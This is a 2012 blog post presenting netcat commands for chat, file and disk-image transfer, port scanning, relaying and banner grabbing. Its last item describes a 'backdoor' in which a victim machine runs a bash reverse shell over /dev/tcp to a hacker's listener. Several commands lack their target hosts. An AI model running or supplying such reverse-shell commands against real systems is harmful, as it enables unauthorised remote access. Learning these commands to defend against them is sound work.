PoiNtEr->: Netcat - The Swiss Army Knife

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.

Search This Blog

Friday, August 24, 2012

Netcat - The Swiss Army Knife

In order to protect yourself against attacks that are performed by netcat, one have to understand how it works. Learning about how netcat attack is carried out can be helpful to help you protect yourself from attacks that are performed by netcat.
Netcat is a small utility that is able to read and write data across TCP and UDP network connections. This tool can be used for many cool things, such as backdoor, port scanner, port listener, port redirector, transferring files, grabbing banners and more. Netcat is often referred to as the Swiss army knife, of course for good reason just like the multifunction usefulness of the vulnerable Swiss army pocket knife.
Well it remind me of summer of 2009, when  i came to known about this utility and you seriously  wont believe that today i have more then 30 nc commands on my script folder and i use them very frequently  , i have discovered different ways to use this utility and they are unique you can also do that . From banner grabbing to RAT,numerous possiblities are their just think yours and post below as comment .

By default, netcat creates a TCP socket either in listening mode (server socket) or a socket that is used in order to connect to a server (client mode). Actually, netcat does not care whether the socket is meant to be a server or a client. All it does is to take the data from stdin and transfer it to the other end across the network.

The simplest example of its usage is to create a server-client chat system. Although this is a very primitive way to chat, it shows how netcat works.

so now its time to try some examples. In examples i ll mostly using my local server Eva.localhost but you can use what ever you want in place of that:

1:Opening a raw connection to a port

nc eva.localhost 22

2:Transfering Files
it can be used to transfer files between two computers. You can create a server that serves the file with the following:
 cat vishal.jpg | nc -l 4444

Receive vishal.jpg on the client machine with the following:
  nc 4444 >vishal.jpg

3:Transporting Partition Image
 dd if=/dev/hda3 | gzip -9 | nc -l 4444

On the remote machine, connect to the server and receive the partition image with the following command:
nc 4444 | pv -b > partition.img.gz

4:Telnet-like Usage
Netcat can be used in order to talk to servers like telnet does. For example, in order to get the definition of the word “server” from the “WordNet” database at the dict.org dictionary server, I’d do:
  nc dict.org 2628

5: Setting up a  webserver
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat  coconut; } | nc -l -p 8087

6:Port Scanning
nc -z 20-80

whenever this z flag is set then nc do not initiate a connection on a port it just check for open ports.

nc -l 8084 | nc Eva.localhost 80

So what is going to happen is that my nc server running on 8084 will be transfer all connection to Eva.localhost sever at port number 80.
Now all request will be sent but problem is that how we are going to recieve a reply from Eva.localhost.So for that purpose we will use backpipe
 nc -l 8084  0<backpipe | nc Eva.localhost 80 1>backpipe

8:Port Forwarding
nc -l -p 80 -c ' nc -l -p 8080'

9:Banner Grabbing
nc -v  Eva.localhost

Finally I got information that the server is running Apache2.2.22(ubuntu)
Now i can search for vulnerabilities if their are any with this specific version.

10: Backdoor(Convert nc to a trojan horse or RAT to exploit a system)
 Machine A(hacker): nc -l -n -vv -p 8083
 Machine B(Victim Running our Trojan):/bin/bash -i > /dev/tcp/ 0<&1 2>&1

server:nc -v -l -p 54656
Client:nc -v Eva.localhost 54656

No comments:

Post a Comment